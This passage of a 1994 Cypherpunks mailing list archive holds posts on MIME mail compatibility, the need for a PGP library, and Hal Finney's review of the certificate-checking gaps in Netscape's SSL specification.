jcorgan at netcom.com Wed Dec 14 14:11:09 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Wed, 14 Dec 94 14:11:09 PST Subject: BofA+Netscape Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >> Wasn't edlin based on the Unix ed? > >Nope. It's very similar to the CP/M `ed'. (I hesitate to say >"identical" since I haven't touched a CP/M system since 1984..), but >the first time I used edlin a couple years ago to edit an autoexec.bat >file, I had CP/M flashbacks... My mistake, I _did_ mean to say CP/M. ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu9qpE1Diok8GKihAQHH/AP/WlodSYb1Zsv2Uj7X/P5NYR0/61EvUaVv s4cnmNPA1irg6QkvQJTS8JaUCAz1DI6pBQP6URlCBPqhjMsJFO8cBP/cyRQYteb+ ppjMi3KKEQmO1psHT+2XVMYHOpQOC1Q+s8BDmtUhrC5FnNf9pXTa622Hz6uPc3+d hUmumhDjuCk= =zHoM -----END PGP SIGNATURE----- From alano at teleport.com Wed Dec 14 14:14:37 1994 From: alano at teleport.com (Alan Olsen) Date: Wed, 14 Dec 94 14:14:37 PST Subject: rad Message-ID: <199412142214.OAA04594@desiree.teleport.com> >I wish the NSA executives would come out of the closet... Don't you know they are supposed to not ask and not tell? ];> (Sorry... Someone had to say it.) | "Encryption ROT13s your mind." | alano at teleport.com | |"Would you rather be tortured by the government | Disclaimer: | |forces or the people's liberation army?" -mklprc | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| From lmccarth at bali.cs.umass.edu Wed Dec 14 14:22:43 1994 From: lmccarth at bali.cs.umass.edu (L. McCarthy) Date: Wed, 14 Dec 94 14:22:43 PST Subject: MIME (again) In-Reply-To: <199412142156.PAA00947@pentagon.io.com> Message-ID: <199412142217.RAA18572@bali.cs.umass.edu> -----BEGIN PGP SIGNED MESSAGE----- Jim McCoy writes: > tcmay at netcom.com (Timothy C. May) writes: > [...] > > This is not a flame, but there sure has been an increase in the > > frequency of this strange MIME messages lately. > > Probably because that is the direction mail is going. If you can't do it > too bad, but don't expect everyone else to wait around for you to catch > up. Time to move your mail into the early 90s and get a MIME-aware mail > agent... I'm using a version of ELM which claims to be MIME-compliant and usually is, but all I saw in Peter Cassidy's message was a collection of random-looking extended-ASCII characters. Usually when something arrives in a locally- unsupported MIME format (like Amanda's GIF a while back), I just get an "unrecognized format" error message. I didn't see any error messages at all this time, just a meaningless jumble of characters (different, incidentally, from the PGP-cipherptext-like characters Tim quoted). We have enough dumb flamewars raging on this list right now; let's not revive an old one. - -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." --FBI Dir. Freeh -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLu9u4Wf7YYibNzjpAQEUBwP/fwjNOFefKF+fpNnBGyAaU8nOFuLMABuq dj/NUMLR7ZrEi7k7HMPNl5F+RyERGOVemWmowh0ZNHy9uVkNk5OtriptbnQCQDWl hEv7Vn+K9PfAy0kLUFLYzY1kUQbgQFHzr5npLgfqQ6S4PBVtAdIJyHcKv4RgCNMM 0cCaMVM1r5M= =+lPD -----END PGP SIGNATURE----- From bshantz at spry.com Wed Dec 14 14:23:59 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Wed, 14 Dec 94 14:23:59 PST Subject: Less Flaming, More Civility Message-ID: <9412142219.AA08224@homer.spry.com> <---- Begin Included Message ----> Return-Path: To: tcmay at netcom.com (Timothy C. May) >Timothy C. May says: >> >> This was one of those "MIME" things I got, that tell me to "Hit any >> key to go on," "Now press ^H-Alt-Hyper-Abort to return to the main >> menu." Perry Metzger wrote: >It wasn't real mime -- the content type was listed as >TEXT/PLAIN; charset=US-ASCII >with a base64 content transfer encoding, but the contents were not >seven bit ascii. I have no idea what the thing was. I thought it was just gibberish since none of my parsers (MIME or otherwise) recognized it as anything valuable. So, I deleted it. That filter worked fine. :-) -- Brad From merriman at metronet.com Wed Dec 14 14:25:00 1994 From: merriman at metronet.com (David K. Merriman) Date: Wed, 14 Dec 94 14:25:00 PST Subject: Big Brother database Message-ID: <199412142224.AA17766@metronet.com> -----BEGIN PGP SIGNED MESSAGE----- > >> >Do we then have a de facto (cardless) national ID? I think so. >> >> You got it, Bunky. > >There's an article in Forbes (the latest copy?) about a company that's >making thermal scanning devices which can identify people via the pattern >of blood vessels in their face. The advantage of this system over >fingerprinting is that it can be done without letting the target know he >or she's being identified. Oh, hot diggitey - just what we *always* needed..... Recycled signature follows :-) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu8mOREpP7+baaPtAQHgjQP/e+eHxzEKuigSihr/wYfUiUrF2fKzI04U r7rQESL4GNG7UOJOisTmSbp9YYB1fMlAPgu0JkWk22YxbgqXIPMnVhyfsWjzH0d8 z5EZ3/8F+MgXqTowY2weuWvsUx8VKFbHsePDemaKjIAEaRUz7R0kVbpMc57XUFMY 9LLKfAYswiQ= =GEuy -----END PGP SIGNATURE----- - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at fohnix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From dave at marvin.jta.edd.ca.gov Wed Dec 14 14:25:34 1994 From: dave at marvin.jta.edd.ca.gov (Dave Otto) Date: Wed, 14 Dec 94 14:25:34 PST Subject: Less Flaming, More Civility In-Reply-To: <199412142156.PAA00947@pentagon.io.com> Message-ID: <9412142224.AA16253@marvin.jta.edd.ca.gov> -----BEGIN PGP SIGNED MESSAGE----- on Wed, 14 Dec 1994 15:56:52 -0600 (CST) mccoy at io.com wrote: > tcmay at netcom.com (Timothy C. May) writes: > [...] > > This is not a flame, but there sure has been an increase in the > > frequency of this strange MIME messages lately. > > Probably because that is the direction mail is going. If you can't do it > too bad, but don't expect everyone else to wait around for you to catch > up. Time to move your mail into the early 90s and get a MIME-aware mail > agent... This IS a flame. It must be nice to be a sysadmin of a net where you have the time to run around and make sure all your users have access to MIME-aware mail agents. I only manage 50 users on three flavors of U*NX using 5 different terminal emulators, and just can't seem to find the time. Maybe I can talk the tax-payers of CA into paying me overtime to do this. Gee I'm really sorry I couldn't add a graphic to this message. I guess us neanderthals just don't have it together. BTW, with your superior sense of technology, I'm quite shocked at the lack of signature on your missive. Dave Otto -- dave at marvin.jta.edd.ca.gov -- daveotto at acm.org "Pay no attention to the man behind the curtain!" [the Great Oz] finger DaveOtto at ACM.org/or server for PGP 2.6 key <0x3300e841> fingerprint = 78 71 3A 5B FD 8A 9A F1 8F BC E8 6A C7 BD A4 DD -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu9wEyuceIAzAOhBAQFzKwP/ZMEIA9IBkEtDK0Tf2TAdS7U+IlX2XN19 jmZxnejpzf/t2zxKc3cEQ9C1VRt7UjVbCYehAjoW9hCycnxLVrlN1+HX9i2oVu4h V338Hfk8RjGX8VcNtI0OrpmJ4LV71IqFNA3vS7QbRWD8qJXIYKYxJXI9OVVSct2E e27rnsNzEO8= =+RaW -----END PGP SIGNATURE----- From nobody at jpunix.com Wed Dec 14 14:29:58 1994 From: nobody at jpunix.com (Anonymous) Date: Wed, 14 Dec 94 14:29:58 PST Subject: pgp library Message-ID: <199412142216.QAA07230@jpunix.com> -----BEGIN PGP SIGNED MESSAGE----- Jim McCoy responds: > In addition to this, the code really sucks as far as modularity > goes. The next big version of PGP, which is supposed to include > library hooks, etc., will probably not be out for five or six > months. I do know of some people who are interested in working on > a PGP compatible library of crypto code, but I am not quite sure > what the status of that project is at this time... This is really a shame, because at the current time one of the most lacking aspects of most crypto software is the key management interface. Encrypting and decrypting pgp format messages is easily accomplished in an acceptable manner using the actual pgp binary. However, writing a decent key-management interface is practically impossible when your only interaction with the PGP key-management code is via the system() function call. Of course, shelling out to the PGP binary isn't the only solution. It's not impossible to create a simple library for encrypting and decrypting pgp format messages (there's PGPTools, and you can roll your own). But you are doubly screwed because the PGP development team has made it clear that the keyring file format will change in 3.0. Who wants to spend time writing a key management API (which, I admit, is NOT trivial...) which is guaranteed not to work in the next version of PGP? Why spend the effort to write a decent PGP front-end, which would necessarily include a key-management interface, when 1) Any effort expended in writing your own library or sprucing up PGPTools is supposedly being duplicated by the PGP team as we speak, and 2) your code is going to break anyway... ? PGP front-ends aren't the only application type whose progress is being slowed by this situation. IMHO, any app that uses PK-crypto should support PGPformat keys, even if it's output isn't designed to be fed into PGP. Don't get me wrong. I understand how difficult it is to do this and I am not ragging on the PGP developers for being slow or lazy or anything like that (I know they are underpaid). BUT, somebody must write a PGP library if we are to see major advancement in the penetration of crypto software into the mainstream. The question is, who is writing it? It almost seems as if PGP development is now happening in secret, and nobody really knows what the statusis on pgp 3.0 and the rumored library. There are people on this list who know, but nobody is telling. If the PGP people really are making progress on a PGP library, we need to know. We can probably help. If not, we also need to know so we can write one. Phase (yes you too can have a pseudonym) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu9kW5Ot8/1bCL+9AQGHaQP/dEaZ+3h/o8AB/gu0VLOjs14F8cgUwkm2 zpqgqFmh6Bna3GzANxSqf7R6Idmwp+y6hzk9YbDiItCE+r0inv9tp0pAE7JlPLg1 bWxM2Nd8r+ZpKhLExepNftJ9iiBewCtWNg9ylxs78VR3QjeKLBWlpcPODeIa2C0S kZlqVBwUBKY= =s1Nh -----END PGP SIGNATURE----- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAy7vWyUAAAEEALwtONPeyYZ6jAYbFWgq8zTqttIclI/1wTjuFC3EkDzsjJM2 kkojkebMTwcJwLUgAL2+2EouAuM+MpyqAs+8/uMW42eP8kCS5XbLzSk5pisZpH/B kflaSeQ6lS6fr66nDHpR33wxQ+0lJWf94rJbaSWZGP2iN1W1jJOt8/1bCL+9AAUR tDlQaGFzZSBKaXR0ZXIgPGFsdC5zZWN1cml0eS5wZ3A+IG9yIDxjeXBoZXJwdW5r c0B0b2FkLmNvbT6JAJUDBRAu71tLk63z/VsIv70BAQkbA/9UUtJpfeTzi+OcNxQn QQEsP+xeusQWaJnS91sEYmjtzDJTqHOZ02Lh2tya0YZVl7ra8WJ6fbTzLR96s+vQ q+qYOwUUq+1OB6L4gdssK5ofRD/4M4dkWJlilY3eHI7Kch8KL/b2L1RG+r0rnEnG 6mH5XaHu7Lebf8wjtexJmKoWXQ== =mpBD -----END PGP PUBLIC KEY BLOCK----- From jcorgan at netcom.com Wed Dec 14 14:31:45 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Wed, 14 Dec 94 14:31:45 PST Subject: A short primer on algebra Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >In the interest of good mathematical terminology, here is a short >primer on the most basic algebraic structures. The definitions are >not complete but rather evocative and are designed to prevent >confusion. Thanks...now if only I were able to go back to the cpunks meeting and listen to your presentation with this knowledge in hand :) ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu9qJ01Diok8GKihAQGTvwP+Iy1yGbs/g0eVz6AJM/qQevYC6l5PVU7N 3XenXt7osO6gASd1NS6Pmfg2EQ/W3ArXgGY5TCL+1d7f6tBv5aUqqQg4Z1/ZJMln 8LAFVbDQIKkLbv/pz+1MqH8/DlEifQJAbNAiQBb/EC7S6J7EyrdIRAMNZy8reWWn AXadYEKOZH0= =EHV/ -----END PGP SIGNATURE----- From bshantz at spry.com Wed Dec 14 14:36:36 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Wed, 14 Dec 94 14:36:36 PST Subject: Less Flaming, More Civility Message-ID: <9412142232.AA08487@homer.spry.com> On the subject of flaming... "It is beter to remain silent and be thought a fool than to speak up and remove all doubt." Can't remember who said it. -- Brad From hfinney at shell.portal.com Wed Dec 14 14:36:53 1994 From: hfinney at shell.portal.com (Hal) Date: Wed, 14 Dec 94 14:36:53 PST Subject: Clarification of my remarks about Netscape Message-ID: <199412142236.OAA21214@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- From: kipp at warp.mcom.com (Kipp E.B. Hickman) > From the spec, the appendix on certificates: > > Certificates are validated using a few straightforward steps. First, > the signature on the certificate is checked and if invalid, the > certificate is invalid (either a transmission error or an attempted > forgery occurred). Next, the CertificateInfo::issuer field is verified > to be an issuer that the application trusts (using an unspecified > mechanism). The CertificateInfo::validity field is checked against the > current date and verified. > > Here is what we do in Netscape (for now). We have imbedded a set of > certificates in the client. The certificates are for issuers of > certificates that "we" trust. Any server which is certified by one of > these issuers will be automatically trusted by the Netscape > Navigator... > > Admittedly this is primitive, but it's a start. Thanks, I had overlooked that in the appendix. I notice you left off the next paragraph: Finally, the CertificateInfo::subject field is checked. This check is optional and depends on the level of trust required by the application using SSL. This subject field would hold the distinguished name of the server. That is pretty important to check! Otherwise anybody with any old certificate will fool you. In your appendix D when you describe the man in the middle attack, you say: The man in the middle operates by pretending to be the real server to the client. With SSL this attack is impossible because of the usage of server certificates. During the security connection handshake the server is required to provide a certificate that is signed by a certificate authority. Contained in the certificate is the server's public key as well as its name and the name of the certificate issuer. The client verifies the certificate by first checking the signature and then verifying that the name of the issuer is somebody that the client trusts. This is in accord with your description above. Note that the only name check mentioned is the name of the issuer. But later, in analyzing this attack, you say: If the certificate provided by the bad guy is legitimate, but for the bad guy instead of for the real server, then the signature will pass but the name check will fail Here you must mean a different name check, the optional one that checks the subject field. So this analysis is somewhat inconsistent with the procedure I quoted just above. Also, when you describe the subject name check as "optional" and depending on the required level of trust, perhaps you should say explicitly that if you don't do it you are vulnerable to a man in the middle attack. Actually, the attack is more general than that: if I could intercept connections to your server and use my own certificate to make the user think he is securely talking to you then I don't actually have to involve you at all. I am not a man in the middle, I am a spoofer pretending to be you. And you have marked the important step in the protocol which would check for this as optional. It appears from your docs that the Netscape client has a File menu item that brings up a Document Information dialog box which displays the distinguished names of the certificate issuer and of the subject (the owner of the key). This does provide a way of checking that you are securely connected to the server that you expect (assuming that the name is recognizable to the user). But it sounds like this is not something which the customer sees automatically. Again, this seems like an important security aspect which should be displayed more prominently. BTW, what do you see in the dialog when you connect securely to mcom.com? What is the subject name in your certificate? I hope these comments are helpful to you. I am surprised that you published this spec only after distributing implementations of it. This wil probably make it hard to change. Usually it is better to do the review before implementation rather than afterwards. Hal Finney hfinney at shell.portal.com -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLu9zThnMLJtOy9MBAQEVPgH+KObAFiOsALCGokUzk7gsqpnVEda85MUD 5LU5P2GjFhmR5msBKr6uuDKSrodUl69bq0/CfpE3qYSzcz7SGPrrag== =ivlO -----END PGP SIGNATURE----- From bshantz at spry.com Wed Dec 14 14:38:43 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Wed, 14 Dec 94 14:38:43 PST Subject: MIME (again) Message-ID: <9412142234.AA08572@homer.spry.com> >I'm using a version of ELM which claims to be MIME-compliant and usually is, >but all I saw in Peter Cassidy's message was a collection of random-looking >extended-ASCII characters. Usually when something arrives in a locally- >unsupported MIME format (like Amanda's GIF a while back), I just get an >"unrecognized format" error message. I didn't see any error messages at all >this time, just a meaningless jumble of characters (different, incidentally, >from the PGP-cipherptext-like characters Tim quoted). Hey, I've figured it out!!! It's the AOL Good Times virus!!! (**WINK**) We've all been had!!! Oh, sorry, I panicked. :-) -- Brad From DBERLIN at peddie.k12.nj.us Wed Dec 14 14:44:15 1994 From: DBERLIN at peddie.k12.nj.us (DBERLIN at peddie.k12.nj.us) Date: Wed, 14 Dec 94 14:44:15 PST Subject: rad Message-ID: <9411147874.AA787456009@PEDDIE.K12.NJ.US> I wish the NSA executives would come out of the closet... That's nice From tcmay at netcom.com Wed Dec 14 14:58:44 1994 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 14 Dec 94 14:58:44 PST Subject: Strange MIME messages In-Reply-To: <9412142205.AA15948@snark.imsi.com> Message-ID: <199412142253.OAA15404@netcom11.netcom.com> Perry E. Metzger wrote: > Timothy C. May says: > > > > This was one of those "MIME" things I got, that tell me to "Hit any > > key to go on," "Now press ^H-Alt-Hyper-Abort to return to the main > > menu." > > It wasn't real mime -- the content type was listed as > TEXT/PLAIN; charset=US-ASCII > > with a base64 content transfer encoding, but the contents were not > seven bit ascii. I have no idea what the thing was. My system marked it as MIME, as the attachment below will show. (To Jim McCoy: My system is in fact capable of handling MIME, but clearly "elm," which I and a lot of other people use, sees messages like this differently from what some others see.) When I quoted the attached junk, it put it in slightly different form than it was originally. Here's what I saw on my screen, cut-and-pasted: M 97 Dec 14 Peter F Cassidy (26) Re: Less Flaming, More Civility [This show that elm marked it as MIME, the "M," even though Perry's system said it was not true MIME.] Date: Wed, 14 Dec 1994 16:18:21 +0001 (EST) From: Peter F Cassidy Subject: Re: Less Flaming, More Civility To: "Timothy C. May" Cc: "Timothy C. May" , cypherpunks at toad.com, tcmay at netcom.com . JE$W\)"F27!UU\WP0,Hc)l(:f-U>3b^3%|?S/AloU *tsa00U]q[B}l5pv(3TLMI*W>h>3b^3%|?S/AloU dXs]r\kZZ{>HqMV-4A$pGEg8SI3 Ja,1gZ ,L:x7QI5^l b6?v E]$[V*K^mr:kfpR [some whitespace deleted] Press any key to return to index. [end of what I saw on the screen.] -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From ianf at sydney.sgi.com Wed Dec 14 15:07:47 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Wed, 14 Dec 94 15:07:47 PST Subject: rad In-Reply-To: <9412142136.AA05403@komets.k12.cfa.org> Message-ID: <9412150959.ZM11151@wiley.sydney.sgi.com> On Dec 15, 8:45am, ndibble at komets.k12.cfa.org wrote: > I wish the NSA executives would come out of the closet... A couple of months ago there was some discussion of this on sci.crypt, as it is widely known that most the the TLA's do have Internet feeds nowadays. The main reason why noone from the NSA comments is simply because there is a perception that anything they say will be taken as NSA policy, disclaimers notwithstanding. Whether this would really happen is debatable, although my personal feeling is that it probably would. In an informational vacuum, people tend to jump to all sorts of conclusions based on inadequate evidence, and this situation would be no different. Ian. From sleas at d.umn.edu Wed Dec 14 15:23:34 1994 From: sleas at d.umn.edu (shawn leas) Date: Wed, 14 Dec 94 15:23:34 PST Subject: pgp lib Message-ID: <199412142323.RAA18339@ub.d.umn.edu> -----BEGIN PGP SIGNED MESSAGE----- > Don't get me wrong. I understand how difficult it is to do this and I > am not ragging on the PGP developers for being slow or lazy or > anything like that (I know they are underpaid). BUT, somebody must > write a PGP library if we are to see major advancement in the > penetration of crypto software into the mainstream. The question is, > who is writing it? It almost seems as if PGP development is now > happening in secret, and nobody really knows what the statusis on pgp > 3.0 and the rumored library. There are people on this list who know, > but nobody is telling. If the PGP people really are making progress > on a PGP library, we need to know. We can probably help. If not, we > also need to know so we can write one. Here here! I agree. There are those who know, and to merely shut out all the expertise that might be on this mailing list is nonesense. I think the pgp library approach is very interesting. It could make pgp almost as common as winsock. We know that there is vast interest in finding a good front-end for pgp. The thing is, no one wants to dig around in code that utilizes poor modularity and try to flesh out an API. Once 3.0 comes out, one could build an app under windows using a PGP v2.x DLL, and a newly made PGP v3 DLL that would handle all kinds of keyfiles, a one step option to convert keyfiles, etc... I think the idea of writing a PGP DLL while the format will change in v3 of PGP is still feasable. Just use it again for backwards compatability. a PGWINP.EXE, a PGPV2.DLL, and a PGPV3.DLL. Or whatever. I've only had experience in UN*X, and maybe I'm oversimplifying everything. But, then again, what is ever simple when you have the trusty old 'windoze' GPF errors. I much preferr the unix 'segmentation fault (core dumped)'. Anyway, I will happily stand corrected on anything I say. Remember, just an idea! #include #include #include #include -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLu99gCdA5IMp25vRAQFM7gf9Fmzx1ueMjuh9iORMQG03+33Z9DRUsL7W s8AFAQCHEwSSLgCNUZBQoRXhgb56c1z+Wvjhk6FvZTF6GyMqdF/8pkJTeQl2tHgo ayX61LDPqu7Xlx5tDyBblfJZ0kJJpF/SIpBe6dUIquSq5NxHodNcH8UmWNXzJ7LO 9fYl5/UJozyqLZHFPISNI/yIZtMJmFn1ogzIFagxrF4YxUVGe6+UAw+ZYfxiYYfb 8yVDdfmCkcjk3ksEcFtgmXs1ZJwAZ8B1IVeAWuJZSxSsO9Au6sO3q3rtFLEY3Vgu Ml45vI9gTJDlR0lwB0tAfx/R/VDfr2ji5Bra27ru69NUvt2zB54pMg== =Jx1p -----END PGP SIGNATURE----- From storm at marlin.ssnet.com Wed Dec 14 15:30:03 1994 From: storm at marlin.ssnet.com (Don Melvin) Date: Wed, 14 Dec 94 15:30:03 PST Subject: PGP Speaks! (well...speech :-) In-Reply-To: <199412141734.LAA21890@zoom.bga.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199412141734.LAA21890 at zoom.bga.com>, you wrote: > > Any cypherpunks who would like to do public demonstrations or talks is > invited to attend the sixth annual RobotFest held here in Austin, TX. > It will be held in the city coliseum on April 1 & 2. If interested then > please contact me through e-mail or call voice to 512-458-5818. This brings up a question: I've been thinking about offering to give talks to some of the local groups about computer security, privacy, and encryption, with emphasis on PGP. Myself not being the most knowlegable on this list and never wanting to re-invent a working wheel, Has anyone developed a 60 to 90 minute presentation outline they'd like to share with the list? Thanks! -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBLu9s1rU8rMgiP9PxAQEXcAL/RWqW0msZGjKBPd5q/lPVL0JL9DTEVsVa 1dimDy6+hA4S6ArsGJyUTY0zIcBpJdC3s8Pdyuj+stcFsp61/Nx3ATrB7mWsDciv uNybEdrto/Hx3kYmOBjQIkpcDEixENw9 =mYir -----END PGP SIGNATURE----- From anonymous-remailer at shell.portal.com Wed Dec 14 15:33:06 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 14 Dec 94 15:33:06 PST Subject: mime Message-ID: <199412142332.PAA26126@jobe.shell.portal.com> > Probably because that is the direction mail is going. If you can't > do it too bad, but don't expect everyone else to wait around for you > to catch up. Time to move your mail into the early 90s and get a > MIME-aware mail agent... Ah, a refreshing sentiment ;) There is an EXCELLENT article in this month's Scientific American which touches upon this issue. "Ensuring the Longevity of Digital Documents". It mentions how a Shakespeare sonnet written four centuries ago is still readable. Data stored/formatted in completly cutting edge ways from a decade or two ago is in danger of becoming unreadable. (8" floppy disks, paper tape, CDC 876 mag tapes anybody?) From mccoy at io.com Wed Dec 14 15:42:48 1994 From: mccoy at io.com (Jim McCoy) Date: Wed, 14 Dec 94 15:42:48 PST Subject: pgp library In-Reply-To: <199412142216.QAA07230@jpunix.com> Message-ID: <199412142342.RAA13299@pentagon.io.com> nobody at jpunix.com (Anonymous) writes: > Jim McCoy responds: > > [...] I do know of some people who are interested in working on > > a PGP compatible library of crypto code, but I am not quite sure > > what the status of that project is at this time... > > This is really a shame, because at the current time one of the most > lacking aspects of most crypto software is the key management > interface. A key-management module is planned for this library. Something that takes the key management stuff out of the various places in the code it is scattered and into it's own is one of the goals of the project. > [...] But you are doubly screwed because the PGP development > team has made it clear that the keyring file format will change in > 3.0. [...] > Who wants to spend time writing a key management API (which, I admit, > is NOT trivial...) which is guaranteed not to work in the next version > of PGP? It is not necessarily guaranteed to not work. We have been in contact with members of the PGP development team, and may be able to emulate much of thier API as things develop. Either way, this is not just a project to develop an updated PGPTools; we hope to have a general purpose crypto library including better math routines, generalized key management, support for multiple public-key and symmetrical ciphers, and hooks for various APIs at different levels. > PGP front-ends aren't the only application type whose progress is > being slowed by this situation. IMHO, any app that uses PK-crypto > should support PGPformat keys, even if it's output isn't designed to > be fed into PGP. Either that, or PGP should learn to use a key standard that might not necessarly be it's own. Key management issues are one of the primary goals for Eclipse and hopefully some of the IETF work in this arena in recent months will help us in determining a direction to work in. Either way, while we want to support as much PGP functionality as possible I doubt we will shackle ourselves with the liabilities of blindly following only the PGP developers when deciding what to do. jim From jdwilson at gold.chem.hawaii.edu Wed Dec 14 16:27:51 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Wed, 14 Dec 94 16:27:51 PST Subject: (fwd) I don't use PGP. (Was:I NUKED PGP.) In-Reply-To: <199412141817.AA11248@access1.digex.net> Message-ID: On Wed, 14 Dec 1994, Black Unicorn wrote: > I'm a Mac user. > > MacPGP is a general nightmare. For those of us who have shell accounts, Have you checked out the Viacrypt MacPGP? If so, do you find the same complaints with it as well? -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> From jdwilson at gold.chem.hawaii.edu Wed Dec 14 16:48:44 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Wed, 14 Dec 94 16:48:44 PST Subject: Less Flaming, More Civility In-Reply-To: <199412142156.PAA00947@pentagon.io.com> Message-ID: On Wed, 14 Dec 1994, Jim McCoy wrote: > Probably because that is the direction mail is going. If you can't do it > too bad, but don't expect everyone else to wait around for you to catch > up. Time to move your mail into the early 90s and get a MIME-aware mail > agent... But if you are not including an enhanced attachment i.e. binary file, why not just send it as a standard mail message? MIME messages are difficult at best to forward, for example. -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> From eric at remailer.net Wed Dec 14 17:18:09 1994 From: eric at remailer.net (Eric Hughes) Date: Wed, 14 Dec 94 17:18:09 PST Subject: rad In-Reply-To: <9412150959.ZM11151@wiley.sydney.sgi.com> Message-ID: <199412150215.SAA05286@largo.remailer.net> From: "Ian Farquhar" The main reason why noone from the NSA comments is simply because there is a perception that anything they say will be taken as NSA policy, disclaimers notwithstanding. Sounds like a job for a remailer. Eric From tcmay at netcom.com Wed Dec 14 18:11:19 1994 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 14 Dec 94 18:11:19 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412142156.PAA00947@pentagon.io.com> Message-ID: <199412150210.SAA05624@netcom7.netcom.com> Notice: MPEG-II Video Mail Attached: Quicktime 2.1-compatible. This messages has been formatted as a HyperMIME document. Do not attempt to read it on a non-HyperMIME-compliant system. ASCII-only portion--hit "n" to download the MPEG-II attachment, hit "^&-D" to stop the automatic transfer which has already begun, hit "##23" to receive a QuarkExpress document describing how to use HyperMIME. If you see garbage characters below, in the ASCII portion of this message, it means you are not on the bleeding edge of technology. Fij4 at Jim McCoy 89g1~wroteiio900deW: ASCII Excerpt> tcmay at netcom.com (Timothy C. May) writes: ASCII Excerpt> [...] ASCII Excerpt> > This is not a flame, but there sure has been an increase in the ASCII Excerpt> > frequency of this strange MIME messages lately. ASCII Excerpt> ASCII Excerpt> Probably because that is the direction mail is going. If you can't do it ASCII Excerpt> too bad, but don't expect everyone else to wait around for you to catch ASCII Excerpt> up. Time to move your mail into the early 90s and get a MIME-aware mail ASCII Excerpt> agent... ASCII Excerpt> ASCII Excerpt> jim FG00998Thanks, Jim, I think you're right. This parochial dependency on archaic things like ASCII and the sentimental attachment we have to 80-column displays is keeping us from advancing. (You'll know you're stuck in the 80-column swamp if the quoted message above overran your display...me, I am switching to a 120-column mode soon, and may adopt a 1280 x 1024 dual column format for all of my messages. If you can't read it, time to move your mail into the early 90s! NOTICE: The JPEG-II movie that accompanies this message has been installed in your root directory. It can be viewed with the HyperMIMEPlayer software, version 1.04 (but don't use 1.03 or earlier, as that will crash your system!). The .WAV files can be listened to with version 4.2 or later MIMEaural players. The Singularity is approaching...soon we'll be changing our system software every few days to keep up with the incompatible messages being sent. I love it. [Tim May's ASCII sig has been replaced by a more modern Postscript version, which was downloaded while you were reading this message and sent directly to your laser printer. All part of HyperMIME making your life easier.] From sandfort at crl.com Wed Dec 14 18:43:20 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Wed, 14 Dec 94 18:43:20 PST Subject: THROUGH THE LOOKING GLASS In-Reply-To: Message-ID: C'punks, I'm coming to you through the magic of telnet. Boy, am I swimming in the deep end. I haven't even figured out how to download, compose offline, upload and transmit. I'll figure that out tomorrow. In the mean time: On Wed, 14 Dec 